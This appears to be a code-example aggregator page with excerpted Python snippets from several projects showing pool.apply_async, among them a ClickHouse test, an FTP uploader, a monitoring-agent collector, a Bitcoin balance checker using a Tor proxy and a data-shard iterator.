                node.query("OPTIMIZE TABLE replicated_table_for_moves FINAL")

        p = Pool(60)
        tasks = []
        tasks.append(p.apply_async(insert, (20, )))
        tasks.append(p.apply_async(optimize, (20, )))

        for task in tasks:
            task.get(timeout=60)

        node1.query("SYSTEM SYNC REPLICA replicated_table_for_moves",
                    timeout=5)
        node2.query("SYSTEM SYNC REPLICA replicated_table_for_moves",
                    timeout=5)

        node1.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"
        node2.query("SELECT COUNT() FROM replicated_table_for_moves") == "40\n"

        data = []  # 1MB in total
        for i in range(2):
            data.append(get_random_string(512 * 1024))  # 500KB value

        time.sleep(3)  # wait until old parts will be deleted
        node1.query("SYSTEM STOP MERGES")
        node2.query("SYSTEM STOP MERGES")

        node1.query("INSERT INTO replicated_table_for_moves VALUES {}".format(
            ','.join(["('" + x + "')" for x in data])))
        node2.query("INSERT INTO replicated_table_for_moves VALUES {}".format(
            ','.join(["('" + x + "')" for x in data])))

        time.sleep(3)  # nothing was moved

        disks1 = get_used_disks_for_table(node1, "replicated_table_for_moves")
        disks2 = get_used_disks_for_table(node2, "replicated_table_for_moves")

        node1.query("SYSTEM START MERGES")
        node2.query("SYSTEM START MERGES")

        set(disks1) == set(["jbod1", "external"])
        set(disks2) == set(["jbod1", "external"])
    finally:
        for node in [node1, node2]:
            node.query("DROP TABLE IF EXISTS replicated_table_for_moves")

Example #33

0

Show file

File: sender.py Project: IdeeFX/projet_perso

    def abortable_ftp(cls, func, *args, **kwargs):

        try:
            timeout = kwargs.get('timeout', None)
            # size in Mbytes
            # get file name + ".lock" extension
            original_file, dir_c, dir_d = args
            file_ = original_file + ".lock"
            size = os.stat(file_).st_size / (1 << 20)
            connection_ok, ftp = cls.connect_ftp()
            if connection_ok:
                proc = ThreadPool(1)
                res = proc.apply_async(func, args=(
                    original_file,
                    ftp,
                ))
                try:
                    # Wait timeout seconds for func to complete.
                    upload_ok, duration = res.get(timeout)
                    file_ = cls.unlock_file(file_)
                    if not upload_ok:
                        shutil.move(file_, dir_c)
                        LOGGER.debug(
                            "Moved file back from repertory %s to repertory %s",
                            dir_d, dir_c)
                    else:
                        LOGGER.info(
                            "File %s of size %f Mo sent to Diffmet in %f s",
                            file_, size, duration)
                        Tools.remove_file(file_, "difmet archive", LOGGER)
                    ftp.quit()
                except multiprocessing.TimeoutError:
                    ftp.close()
                    proc.terminate()

                    LOGGER.error(
                        "Timeout of %f s exceeded for sending file %s"
                        " on difmet. Checking upload.", timeout, original_file)
                    _, ftp = cls.connect_ftp()
                    upload_ok = cls.check_transfer(basename(original_file),
                                                   ftp)
                    if upload_ok:
                        LOGGER.warning(
                            "Process hit the timeout but "
                            "file %s of size %f Mo was still sent to Diffmet",
                            file_, size)
                        Tools.remove_file(file_, "difmet archive", LOGGER)
                    else:
                        file_ = cls.unlock_file(file_)
                        LOGGER.error("FTP upload of %s s failed.", file_)
                        # move the file back from D to C
                        shutil.move(file_, dir_c)
                        LOGGER.debug(
                            "Moved file back from repertory %s to repertory %s",
                            dir_d, dir_c)
                except Exception as exc:
                    file_ = cls.unlock_file(file_)
                    trace = ''.join(
                        traceback.format_exception(type(exc), exc,
                                                   exc.__traceback__))
                    LOGGER.error(
                        "Error when uploading file %s with "
                        "trace :\n %s", file_, trace)
                    ftp.quit()
            else:
                file_ = cls.unlock_file(file_)
                LOGGER.error("Couldn't connect to FTP for uploading file %s ",
                             file_)
                # move the file back from D to C
                shutil.move(file_, dir_c)
                LOGGER.debug(
                    "Moved file back from repertory %s to repertory %s", dir_d,
                    dir_c)

            proc.terminate()
        except Exception as exc:
            trace = ''.join(
                traceback.format_exception(type(exc), exc, exc.__traceback__))
            LOGGER.error("Error when uploading file %s with "
                         "trace :\n %s", file_, trace)

Example #34

0

Show file

File: collector.py Project: zreigz/monasca-agent

class Collector(util.Dimensions):

    """The collector is responsible for collecting data from each check and

    passing it along to the emitters, who send it to their final destination.
    """

    def __init__(self, agent_config, emitter, checksd):
        super(Collector, self).__init__(agent_config)
        self.agent_config = agent_config
        self.os = util.get_os()
        self.plugins = None
        self.emitter = emitter
        socket.setdefaulttimeout(15)
        self.run_count = 0
        self.continue_running = True
        self.collection_metrics = {}

        # is of type {check_name: check}
        initialized_checks_d = checksd['initialized_checks']

        self.pool_size = int(self.agent_config.get('num_collector_threads', 1))
        log.info('Using %d Threads for Collector' % self.pool_size)
        self.pool = Pool(self.pool_size)
        self.pool_full_count = 0
        self.collection_times = {}
        self.collection_results = {}
        self.collect_runs = 0
        for check in initialized_checks_d:
            derived_collect_periods = 1
            if 'collect_period' in check.init_config:
                if check.init_config['collect_period'] < 0:
                    log.warn('Invalid negative time parameter. '
                             'collect_period for %s will be reset '
                             'to default' % check.name)
                else:
                    # This equation calculates on which nth run the plugin
                    # gets called. It converts the collect_period from seconds
                    # to an integer which holds the collection round the
                    # plugin should get called on.
                    derived_collect_periods = (
                        ((check.init_config['collect_period'] - 1)
                         / agent_config['check_freq']) + 1)
            self.collection_times[check.name] = {
                'check': check,
                'last_collect_time': 99999999,
                'derived_collect_periods': derived_collect_periods}
        self.pool_full_max_retries = int(self.agent_config.get('pool_full_max_retries',
                                                               4))

    def _emit(self, payload):
        """Send the payload via the emitter.
        """
        # Don't try to send to an emitter if we're stopping/
        if self.continue_running:
            try:
                self.emitter(payload, log, self.agent_config['forwarder_url'])
            except Exception:
                log.exception("Error running emitter: %s" % self.emitter.__name__)

    def _set_status(self, collect_duration):
        if self.run_count <= FLUSH_LOGGING_INITIAL or self.run_count % FLUSH_LOGGING_PERIOD == 0:
            log.info("Finished run #%s. Collection time: %.2fs." %
                     (self.run_count, round(collect_duration, 2)))
            if self.run_count == FLUSH_LOGGING_INITIAL:
                log.info("First flushes done, next flushes will be logged every %s flushes." %
                         FLUSH_LOGGING_PERIOD)

        else:
            log.debug("Finished run #%s. Collection time: %.2fs." %
                      (self.run_count, round(collect_duration, 2),))

    def add_collection_metric(self, name, value):
        self.collection_metrics[name] = value

    def collector_stats(self, num_metrics, collection_time):
        thread_count = threading.active_count()
        self.add_collection_metric('monasca.thread_count', thread_count)
        if thread_count > MAX_THREADS_COUNT:
            log.warn("Collector thread count is high: %d" % thread_count)

        self.add_collection_metric('monasca.collection_time_sec', collection_time)

    def run(self, check_frequency):
        """Collect data from each check and submit their data.

        Also, submit a metric which is how long the checks_d took
        """
        timer = util.Timer()
        self.run_count += 1
        log.debug("Starting collection run #%s" % self.run_count)

        # checks_d checks
        num_metrics = self.run_checks_d(check_frequency)

        collect_duration = timer.step()

        # Warn if collection time is approaching the collection period
        if collect_duration > (4 * check_frequency / 5):
            log.warn("Collection time (s) is high: %.1f, metrics count: %d" %
                     (collect_duration, num_metrics))

        self.collector_stats(num_metrics, collect_duration)
        collect_stats = []
        dimensions = {'component': 'monasca-agent', 'service': 'monitoring'}
        # Add in metrics on the collector run
        for name, value in self.collection_metrics.items():
            metric = metrics.Metric(name,
                                    self._set_dimensions(dimensions),
                                    tenant=None)
            collect_stats.append(metric.measurement(value, time.time()))
        self.collection_metrics.clear()
        self._emit(collect_stats)

        # Persist the status of the collection run.
        self._set_status(collect_duration)

    def run_single_check(self, check):
        """Run a single check

        returns number of measurement collected, collection time
        """

        sub_timer = util.Timer()
        count = 0
        log.debug("Running plugin %s" % check.name)
        try:

            # Run the check.
            check.run()

            current_check_metrics = check.get_metrics()

            # Emit the metrics after each check
            self._emit(current_check_metrics)

            # Save the status of the check.
            count += len(current_check_metrics)

        except Exception:
            log.exception("Error running plugin %s" % check.name)

        sub_collect_duration = sub_timer.step()
        sub_collect_duration_mills = sub_collect_duration * 1000
        log.debug("Finished plugin %s run. Collection time: %.2fms %d Metrics." % (
                  check.name, round(sub_collect_duration_mills, 2), count))
        if sub_collect_duration > util.get_sub_collection_warn():
            log.warn("Collection time for check %s is high: %.2fs." % (
                     check.name, round(sub_collect_duration, 2)))
        return count, sub_collect_duration_mills

    def wait_for_results(self, check_frequency, start_time):
        """Wait either for all running checks to finish or
        for check_frequency seconds, whichever comes first

        returns number of measurements collected
        """

        # Make sure we check for results at least once
        wait_time = check_frequency / 10
        measurements = 0
        time_left = check_frequency
        while time_left > 0 and self.collection_results:
            for check_name in list(self.collection_results.keys()):
                result = self.collection_results[check_name]['result']
                result.wait(wait_time)
                if result.ready():
                    log.debug('Plugin %s has completed' % check_name)
                    if not result.successful():
                        log.error('Plugin %s failed' % check_name)
                    else:
                        count, collect_time = result.get()
                        measurements += count
                        self.collection_times[check_name]['last_collect_time'] = collect_time
                    del self.collection_results[check_name]
                else:
                    log.debug('Plugin %s still running' % check_name)
            time_left = start_time + check_frequency - time.time()
        return measurements

    def start_checks_in_thread_pool(self, start_time):
        """Add the checks that are not already running to the Thread Pool
        """

        # Sort by the last collection time so the checks that take the
        # least amount of time are run first so they are more likely to
        # complete within the check_frequency
        sorted_checks = sorted(self.collection_times.values(),
                               key=lambda x: x['last_collect_time'])
        for entry in sorted_checks:
            check = entry['check']
            last_collect_time = entry['last_collect_time']
            if not self.continue_running:
                break
            if check.name in self.collection_results:
                log.warning('Plugin %s is already running, skipping' % check.name)
                continue
            if self.collect_runs % entry['derived_collect_periods'] != 0:
                log.debug('%s has not skipped enough collection periods yet. '
                          'Skipping.' % check.name)
                continue
            log.debug('Starting plugin %s, old collect time %d' %
                      (check.name, last_collect_time))
            async_result = self.pool.apply_async(self.run_single_check, [check])
            self.collection_results[check.name] = {'result': async_result,
                                                   'start_time': start_time}
        self.collect_runs += 1

    def run_checks_d(self, check_frequency):
        """Run defined checks_d checks using the Thread Pool.

        returns number of Measurements.
        """

        start_time = time.time()
        self.start_checks_in_thread_pool(start_time)

        measurements = self.wait_for_results(check_frequency, start_time)

        # See if any checks are still running
        if self.collection_results:
            # Output a metric that can be used for Alarming. This metric is only
            # emitted when there are checks running too long so a deterministic
            # Alarm Definition should be created when monitoring it
            self.add_collection_metric('monasca.checks_running_too_long',
                                       len(self.collection_results))
            for check_name in self.collection_results:
                run_time = time.time() - self.collection_results[check_name]['start_time']
                log.warning('Plugin %s still running after %d seconds' % (
                            check_name, run_time))

        if len(self.collection_results) >= self.pool_size:
            self.pool_full_count += 1
            if (self.pool_full_count > self.pool_full_max_retries):
                log.error('Thread Pool full and %d plugins still running for ' +
                          '%d collection cycles, exiting' %
                          (len(self.collection_results), self.pool_full_count))
                os._exit(1)
        else:
            self.pool_full_count = 0

        return measurements

    def stop(self, timeout=0):
        """Tell the collector to stop at the next logical point.
        """
        # This is called when the process is being killed, so
        # try to stop the collector as soon as possible.
        # Most importantly, don't try to submit to the emitters
        # because the forwarder is quite possibly already killed
        # in which case we'll get a misleading error in the logs.
        # Best to not even try.

        log.info("stopping the collector with timeout %d seconds" % timeout)

        self.continue_running = False
        for check_name in self.collection_times:
            check = self.collection_times[check_name]['check']
            check.stop()

        for check_name in self.collection_results:
            run_time = time.time() - self.collection_results[check_name]['start_time']
            log.info('When exiting... Plugin %s still running after %d seconds' % (
                check_name, run_time))

        self.pool.close()

        # Won't call join() if timeout is zero. If we are in an event thread
        # a BlockingSwitchOutError occurs if wait

        if (timeout > 0):
            timer = util.Timer()
            for worker in self.pool._pool:
                t = timeout - timer.total()
                if t <= 0:
                    break
                if worker.is_alive():
                    try:
                        worker.join(t)
                    except Exception:
                        log.error("Unexpected error: ", sys.exc_info()[0])

        for worker in self.pool._pool:
            if worker.is_alive():
                # the worker didn't complete in the specified timeout.
                # collector must honor the stop request to avoid agent stop/restart hang.
                # os._exit() should be called after collector stops.
                log.info('worker %s is still alive when collector stop times out.' % worker.name)

Example #35

0

Show file

 def __init__(self, model_path, parallel, batch_size, bootstrap, vocab_txt):
     config = tf.ConfigProto(inter_op_parallelism_threads=parallel,
                             intra_op_parallelism_threads=1)
     os.environ['NEURONCORE_GROUP_SIZES'] = ','.join(
         '1' for _ in range(parallel))
     self.predictor_list = [
         tf.contrib.predictor.from_saved_model(model_path, config=config)
         for _ in range(parallel)
     ]
     if self.predictor_list[0].feed_tensors[
             'input_ids'].shape.is_fully_defined():
         self.batch_size = self.predictor_list[0].feed_tensors[
             'input_ids'].shape.as_list()[0]
     else:
         self.batch_size = batch_size
     self.bootstrap = bootstrap
     self.tokenizer = tokenization.FullTokenizer(vocab_file=vocab_txt,
                                                 do_lower_case=True)
     self.num_infer = 0
     self.num_correct = 0
     self.output_name = list(self.predictor_list[0].fetch_tensors.keys())[0]
     self.iid = 0
     self.throughput_list = []
     self.latency_list = []
     self.max_len_latency_list = 1000
     self.iid_lock = Lock()
     if bootstrap:
         self.request_queue_list = [
             collections.deque() for _ in range(parallel)
         ]
         eval_data_path = os.path.join(os.path.dirname(__file__),
                                       'glue_mrpc_dev.tsv')
         tsv = mrpc_feature.read_tsv(eval_data_path)
         for request_queue in self.request_queue_list:
             for _ in range(1024):
                 data_list = random.choices(tsv[1:], k=self.batch_size)
                 model_feed_dict_list = [
                     mrpc_feature.text_pair_to_model_feed_dict(
                         data[3], data[4], self.tokenizer)
                     for data in data_list
                 ]
                 label_list = [int(data[0]) for data in data_list]
                 batch_labels = np.array(label_list)
                 batch_feeds = {
                     key: np.concatenate(
                         [feed[key] for feed in model_feed_dict_list],
                         axis=0)
                     for key in model_feed_dict_list[0].keys()
                 }
                 request_queue.append((batch_feeds, batch_labels))
     else:
         self.request_queue_list = [[] for _ in range(parallel)]
     self.result_map = {}
     self.alive = True
     dummy_feed = {
         'input_ids': np.zeros([1, 128], dtype=np.int32),
         'input_mask': np.zeros([1, 128], dtype=np.int32),
         'segment_ids': np.zeros([1, 128], dtype=np.int32),
     }
     self.dummy_feeds = [(None, dummy_feed) for _ in range(self.batch_size)]
     model_feed_dict_list = [dummy_feed for _ in range(self.batch_size)]
     batch_feeds = {
         key: np.concatenate([feed[key] for feed in model_feed_dict_list],
                             axis=0)
         for key in model_feed_dict_list[0].keys()
     }
     pool = Pool(len(self.predictor_list))
     for pred in self.predictor_list:
         pool.apply_async(pred, (batch_feeds, ))
         time.sleep(1)
     pool.close()
     pool.join()

Example #36

0

Show file

class btc_processor(threading.Thread):
    # Thread to handle BTC operations. Queries multiple stratum servers in case of failure
    # Requires a SOCKS proxy to be provided - by default the Tor SOCKS proxy is used

    def __init__(self, socks_proxy, socks_port, stratum_servers, req_queue,
                 res_queue):
        self.socks_proxy = socks_proxy
        self.socks_port = socks_port
        self.request_queue = req_queue
        self.response_queue = res_queue
        self.stratum_servers = stratum_servers
        self.running = True
        self.pool = ThreadPool(
            processes=4
        )  # maximum of 4 BTC operations will be allowed in parallel
        threading.Thread.__init__(self)

    def get_random_server(self):
        x = random.randrange(0, len(self.stratum_servers) - 1, 1)
        (serverstring, ) = self.stratum_servers[x]
        (server, port, connectiontype) = str(serverstring).split(':')
        return (server, port, connectiontype)

    def get_stratum_peers(self):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Updating list of stratum peers via " + str(
                server) + " attempt #" + str(attempts)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                response = jsonrpc.request('server.peers.subscribe',
                                           timeout=15)
                if not isinstance(response, list):
                    attempts += 1
                    continue
                return (response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query peers on stratum server " + str(
                    server)
                continue
        return  # error

    def cb_get_stratum_peers(self, response):
        if response:  # If get peers returned data then process it
            peers = []
            for peer in response:
                #print peer
                for item in peer[2]:
                    if item[0] == 'p':
                        port = item[1:]
                    if item[0] == 's':
                        ssl = True
                        sport = item[1:]
                if sport:  # prefer the ssl port if specified
                    port = sport
                if ssl:  # only use servers that support ssl
                    peers.append(
                        (peer[1] + ':' + port + ':s', ))  # why the tuple?
                    #print peers[-1]
            response_msg = queue_task(0, 'btc_update_stratum_peers',
                                      {'peers': peers})
            # Update our list of peers # TODO - this could be checked and merged with a known-good electrum server list
            self.stratum_servers = peers  # update the local list of peers
            self.response_queue.put(
                response_msg
            )  # also update the backend thread with the current peers so that the config database can be updated
            # TODO: implement dead host checking, especially needed for access through Tor
        else:
            print "Warning: BTC processor unable to refresh list of stratum peers, giving up for now"

    def get_balance(self, addr):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Checking BTC balance for " + str(
                addr) + " via " + str(server)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                if isinstance(addr, list):
                    response = []
                    for addr_item in addr:
                        response.append(
                            (addr_item,
                             jsonrpc.request('blockchain.address.get_balance',
                                             [addr_item],
                                             timeout=15)))
                    return (response)
                else:
                    response = jsonrpc.request(
                        'blockchain.address.get_balance', [addr], timeout=15)
                    if not isinstance(response, dict):
                        #print "Balance is not a dict..."
                        attempts += 1
                        continue
                    return (addr, response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query balance on stratum server " + str(
                    server)
                continue
        return (addr, -1)  # error , return -1

    def cb_get_balance(self, response):
        # TODO - refactor this!
        if not isinstance(response, list):
            (address, balance) = response
            if balance == -1:
                print "Warning: BTC processor unable to get balance for address " + str(
                    address) + ", giving up for now"
                response_msg = queue_task(
                    0, 'btc_update_balance', {
                        'address': address,
                        'balance_confirmed': -1,
                        'balance_unconfirmed': -1
                    })
            else:
                response_msg = queue_task(
                    0, 'btc_update_balance', {
                        'address': address,
                        'balance_confirmed': balance['confirmed'],
                        'balance_unconfirmed': balance['unconfirmed']
                    })
            self.response_queue.put(response_msg)
        else:
            for response_item in response:
                (address, balance) = response_item
                if balance == -1:
                    print "Warning: BTC processor unable to get balance for address " + str(
                        address) + ", giving up for now"
                    response_msg = queue_task(
                        0, 'btc_update_balance', {
                            'address': address,
                            'balance_confirmed': -1,
                            'balance_unconfirmed': -1
                        })
                else:
                    response_msg = queue_task(
                        0, 'btc_update_balance', {
                            'address': address,
                            'balance_confirmed': balance['confirmed'],
                            'balance_unconfirmed': balance['unconfirmed']
                        })
                self.response_queue.put(response_msg)

    def get_unspent(self, addr):
        attempts = 0
        while attempts < 8:
            sleep(1)
            (server, port, connectiontype) = self.get_random_server()
            print "Info: Checking BTC unspent outputs for " + str(
                addr) + " via " + str(server)
            try:
                jsonrpc = JSONRPCProxy(str(server),
                                       int(port),
                                       socks_host=str(self.socks_proxy),
                                       socks_port=int(self.socks_port),
                                       connect_timeout=30)
                if isinstance(addr, list):
                    response = []
                    for addr_item in addr:
                        response.append(
                            (addr_item,
                             jsonrpc.request('blockchain.address.listunspent',
                                             [addr_item],
                                             timeout=15)))
                    return (response)
                else:
                    response = jsonrpc.request(
                        'blockchain.address.get_history', [addr], timeout=15)
                    if not isinstance(response, list):
                        print "History is not a list..."
                        attempts += 1
                        continue
                    return (addr, response)
            except:
                attempts += 1
                print "Warning: BTC processor could not query balance on stratum server " + str(
                    server)
                continue
        return (addr, -1)  # error , return -1

    def cb_get_unspent(self, response):
        # TODO - refactor this!
        if not isinstance(response, list):
            (address, unspent) = response
            if unspent == -1:
                print "Warning: BTC processor unable to get unspent outputs for address " + str(
                    address) + ", giving up for now"
                response_msg = queue_task(0, 'btc_update_unspent', {
                    'address': address,
                    'unspent_outputs': -1
                })
            else:
                response_msg = queue_task(0, 'btc_update_unspent', {
                    'address': address,
                    'unspent_outputs': unspent
                })
            self.response_queue.put(response_msg)
        else:
            for response_item in response:
                (address, unspent) = response_item
                if unspent == -1:
                    print "Warning: BTC processor unable to get unspent outputs for address " + str(
                        address) + ", giving up for now"
                    response_msg = queue_task(0, 'btc_update_unspent', {
                        'address': address,
                        'unspent_outputs': -1
                    })
                else:
                    response_msg = queue_task(0, 'btc_update_unspent', {
                        'address': address,
                        'unspent_outputs': unspent
                    })
                self.response_queue.put(response_msg)

    def run(self):
        print "Info: BTC processor thread started using SOCKS proxy " + self.socks_proxy + ":" + self.socks_port + " attempting to refresh stratum peers"

        self.pool.apply_async(self.get_stratum_peers, (),
                              callback=self.cb_get_stratum_peers)

        while self.running:
            if not self.request_queue.empty():
                # New BTC processing tasks are here
                task = self.request_queue.get()
                if task.command == 'btc_balance_check':
                    address = task.data[
                        'address']  # may be single address or list
                    self.pool.apply_async(self.get_balance, (address, ),
                                          callback=self.cb_get_balance)
                if task.command == 'btc_get_unspent':
                    address = task.data[
                        'address']  # may be single address or list
                    self.pool.apply_async(self.get_unspent, (address, ),
                                          callback=self.cb_get_unspent)
                elif task.command == 'btc_broadcast_txn':
                    txn = task.data['txn']
                    # TODO: Send txn
                elif task.command == 'shutdown':
                    self.running = False
                else:
                    print "Warning: BTC Processor thread received unknown BTC command - " + task.command
            sleep(0.1)  # rest

        print "Info: BTC Processor shutting down"
        self.pool.close()
        self.pool.join()

Example #37

0

Show file

    r = requests.get(node['0']+'/timerstart')
    r = requests.get(node['1']+'/timerstart')
    r = requests.get(node['2']+'/timerstart')
    r = requests.get(node['3']+'/timerstart')
    r = requests.get(node['4']+'/timerstart')
    r = requests.get(node['5']+'/timerstart')
    r = requests.get(node['6']+'/timerstart')
    r = requests.get(node['7']+'/timerstart')
    r = requests.get(node['8']+'/timerstart')
    r = requests.get(node['9']+'/timerstart')



    target_url = node['0']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['1']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['2']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['3']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['4']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['5']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['6']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['7']+'/startwork'
    futures.append(pool.apply_async(requests.get, [target_url]))
    target_url = node['8']+'/startwork'

Example #38

0

Show file

    html = get_page(url, i)
    # print(html)
    if html:
        data = get_page_detail(html)
        for item in data:
            result = save_to_mongo(item)
            while result:
                l.append(item)
        save_to_mongo(item)
    else:
        print('页面无数据')


if __name__ == '__main__':
    groups = [x for x in range(GROUP_START, GROUP_END + 1)]

    try:
        requestDatas(True)
        pool = TreadPool(4)
        for idx, item in enumerate(groups):
            # print(str(idx) + ":" + str(item))
            pool.apply_async(main, (item, ))

        pool.close()
        pool.join()

        mongo_obj = MongodbConn()
        mongo_obj.run()
    except:
        pass

Example #39

0

Show file

        def iterate(dataset, batch_size):
            num_shards = dataset.get_number_shards()
            if not deterministic:
                shard_perm = np.random.permutation(num_shards)
            else:
                shard_perm = np.arange(num_shards)

            # (ytz): Depending on the application, thread-based pools may be faster
            # than process based pools, since process based pools need to pickle/serialize
            # objects as an extra overhead. Also, as hideously as un-thread safe this looks,
            # we're actually protected by the GIL.
            pool = Pool(1)  # mp.dummy aliases ThreadPool to Pool
            next_shard = pool.apply_async(dataset.get_shard, (shard_perm[0], ))

            total_yield = 0

            if batch_size is None:
                num_global_batches = num_shards
            else:
                num_global_batches = math.ceil(dataset.get_shape()[0][0] /
                                               batch_size)

            cur_global_batch = 0
            cur_shard = 0
            carry = None

            while cur_global_batch < num_global_batches:

                X, y, w, ids = next_shard.get()
                if cur_shard < num_shards - 1:
                    next_shard = pool.apply_async(
                        dataset.get_shard, (shard_perm[cur_shard + 1], ))
                else:
                    pool.close()

                if carry is not None:
                    X = np.concatenate([carry[0], X], axis=0)
                    if y is not None:
                        y = np.concatenate([carry[1], y], axis=0)
                    if w is not None:
                        w = np.concatenate([carry[2], w], axis=0)
                    ids = np.concatenate([carry[3], ids], axis=0)
                    carry = None

                n_shard_samples = X.shape[0]
                cur_local_batch = 0
                if batch_size is None:
                    shard_batch_size = n_shard_samples
                else:
                    shard_batch_size = batch_size

                num_local_batches = math.ceil(n_shard_samples /
                                              shard_batch_size)

                if n_shard_samples == 0:
                    cur_shard += 1
                    continue
                if not deterministic:
                    sample_perm = np.random.permutation(n_shard_samples)
                else:
                    sample_perm = np.arange(n_shard_samples)

                while cur_local_batch < num_local_batches:
                    start = cur_local_batch * shard_batch_size
                    end = min(n_shard_samples,
                              (cur_local_batch + 1) * shard_batch_size)

                    indices = range(start, end)
                    perm_indices = sample_perm[indices]
                    X_b = X[perm_indices]

                    if y is not None:
                        y_b = y[perm_indices]
                    else:
                        y_b = None

                    if w is not None:
                        w_b = w[perm_indices]
                    else:
                        w_b = None

                    ids_b = ids[perm_indices]

                    assert len(X_b) <= shard_batch_size
                    if len(
                            X_b
                    ) < shard_batch_size and cur_shard != num_shards - 1:
                        assert carry is None
                        carry = [X_b, y_b, w_b, ids_b]
                    else:

                        # (ytz): this skips everything except possibly the last shard
                        if pad_batches:
                            (X_b, y_b, w_b,
                             ids_b) = pad_batch(shard_batch_size, X_b, y_b,
                                                w_b, ids_b)

                        yield X_b, y_b, w_b, ids_b
                        cur_global_batch += 1
                    cur_local_batch += 1
                cur_shard += 1

Example #40

0

Show file

File: fmripop.py Project: fmristats/fmristats

def call(args):

    ####################################################################
    # Options
    ####################################################################

    remove_lock = args.remove_lock
    ignore_lock = args.ignore_lock
    force = args.force
    skip = args.skip
    verbose = args.verbose

    scan_cycle = args.cycle
    resolution = args.resolution
    diffeomorphism_nb = args.diffeomorphism_nb

    if args.new_diffeomorphism is None:
        new_diffeomorphism = diffeomorphism_nb
    else:
        new_diffeomorphism = args.new_diffeomorphism

    if (resolution is None) or (resolution == 'native') or np.isclose(
            resolution, 0):
        resolution = None

    ####################################################################
    # Study
    ####################################################################

    study = get_study(args)

    if study is None:
        print('No study found. Nothing to do.')
        return

    study.set_rigids(args.rigids)
    study.set_diffeomorphism(new_diffeomorphism)
    #study.set_standard_space('isometric')

    ####################################################################
    # Create iterator
    ####################################################################

    study_iterator = study.iterate('session',
                                   'reference_maps',
                                   'result',
                                   'population_map',
                                   new=['population_map'],
                                   integer_index=True,
                                   verbose=args.verbose)

    df = study_iterator.df.copy()

    df['locked'] = False

    ####################################################################
    # Wrapper
    ####################################################################

    def wm(index, name, session, reference_maps, population_map, result,
           file_population_map):

        if type(population_map) is Lock:
            if remove_lock or ignore_lock:
                if verbose:
                    print('{}: Remove lock'.format(name.name()))
                population_map.unlock()
                if remove_lock:
                    return
            else:
                if verbose:
                    print('{}: Locked'.format(name.name()))
                return

        elif population_map is not None and not force:
            if verbose:
                print(
                    '{}: PopulationMap already exists. Use -f/--force to overwrite'
                    .format(name.name()))
            return

        if skip:
            return

        if verbose:
            print('{}: Lock: {}'.format(name.name(), file_population_map))

        lock = Lock(name, 'fmripop', file_population_map)
        df.ix[index, 'locked'] = True

        dfile = os.path.dirname(file_population_map)
        if dfile and not isdir(dfile):
            os.makedirs(dfile)

        lock.save(file_population_map)

        ####################################################################
        # Create population map from a session instance
        ####################################################################

        if session is None:
            print('{}: No session found'.format(name.name()))
            df.ix[index, 'valid'] = False
            lock.conditional_unlock(df, index, verbose)
            return

        if diffeomorphism_nb == 'identity':
            population_map = pmap_scanner(session=session,
                                          resolution=resolution,
                                          name=new_diffeomorphism)

            if verbose:
                if resolution:
                    print("""{}:
                    Standard space equals scanner space. Diffeomorphism
                    equals identity. Resolution is ({} mm)**3.""".format(
                        name.name(), resolution))
                else:
                    print("""{}:
                    Standard space equals scanner space. Diffeomorphism
                    equals identity. Resolution is native.""".format(
                        name.name()))

        ####################################################################
        # Create population map from a session and reference instance
        ####################################################################

        elif diffeomorphism_nb == 'scanner':
            if reference_maps is None:
                print('{}: No ReferenceMaps found'.format(name.name()))
                df.ix[index, 'valid'] = False
                lock.conditional_unlock(df, index, verbose)
                return

            if scan_cycle is None:
                population_map = pmap_scanner(session=session,
                                              reference_maps=reference_maps,
                                              resolution=resolution,
                                              name=new_diffeomorphism)

                if verbose:
                    if resolution:
                        print("""{}:
                        Standard space equals scanner space. Diffeomorphism
                        maps to the average position of the subject in the
                        scanner. Resolution is ({} mm)**3.""".format(
                            name.name(), resolution))
                    else:
                        print("""{}:
                        Standard space equals scanner space. Diffeomorphism
                        maps to the average position of the subject in the
                        scanner. Resolution is native.""".format(name.name()))

            else:
                try:
                    outlying_cycles = reference_maps.outlying_cycles
                except:
                    if verbose:
                        print("""{}:
                        I have found no information
                        about outlying scan cycles!""".format(name.name()))
                    outlying_cycles = None

                if outlying_cycles is None:
                    scan_cycle_to_use = cycle[0]
                else:
                    if outlying_cycles[scan_cycle].all():
                        df.ix[index, 'valid'] = False
                        print("""{}:
                        All suggested reference cycles have been marked as
                        outlying. Unable to proceed. Please specify a
                        different scan cycle (using --cycle) as
                        reference.""".format(name.name()))
                        lock.conditional_unlock(df, index, verbose, True)
                        return
                    elif outlying_cycles[scan_cycle].any():
                        for c, co in zip(scan_cycle,
                                         outlying_cycles[scan_cycle]):
                            if co:
                                if verbose:
                                    print("""{}:
                                    Scan cycle {:d} marked as outlying,
                                    using fallback.""".format(name.name(), c))
                            else:
                                scan_cycle_to_use = c
                                break
                    else:
                        scan_cycle_to_use = scan_cycle[0]

                population_map = pmap_scanner(session=session,
                                              reference_maps=reference_maps,
                                              scan_cycle=scan_cycle_to_use,
                                              resolution=resolution,
                                              name=new_diffeomorphism)

                population_map.set_nb(
                    Image(reference=session.reference,
                          data=session.data[scan_cycle_to_use],
                          name=session.name.name() +
                          '-{:d}'.format(scan_cycle_to_use)))

                if verbose:
                    if resolution:
                        print("""{}:
                        Standard space equals scanner space,
                        diffeomorphism maps to subject position during
                        scan cycle: {:d}. Resolution is ({} mm)**3.""".format(
                            name.name(), scan_cycle_to_use, resolution))
                    else:
                        print("""{}:
                        Standard space equals scanner space,
                        diffeomorphism maps to subject position during
